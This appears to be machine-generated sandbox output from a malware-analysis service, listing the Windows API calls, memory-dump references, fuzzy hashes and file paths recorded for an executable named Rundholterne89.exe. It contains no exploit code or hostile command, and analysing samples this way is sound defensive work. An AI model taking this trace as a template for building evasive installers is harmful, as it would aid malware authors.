                                                                                            • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                              • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                              • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                              • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                            • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                            • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                            • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                            • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                            • GetLastError.KERNEL32 ref: 0040549F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                            • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                            • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                            • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                            • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                            • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                            • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                            • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                            • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                            • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                            • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                            • Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                            • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 00403F72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                            • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                            • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                            • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                            • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                            • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                            • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                            • GetClientRect.USER32(?,?), ref: 00405131
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                                            • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                            • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                            • CreatePopupMenu.USER32 ref: 00405310
                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                            • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                            • EmptyClipboard.USER32 ref: 004053B0
                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                            • CloseClipboard.USER32 ref: 00405401
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 590372296-0
                                                                                            • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                            • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                            • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                            • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00429868), ref: 004044B9
                                                                                            • lstrcatA.KERNEL32(?,C:\Users\user\Stanglorgnet.bro), ref: 004044C5
                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro
                                                                                            • API String ID: 2624150263-426964393
                                                                                            • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                            • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
APIs
• CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
Strings
• C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 0040211D
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
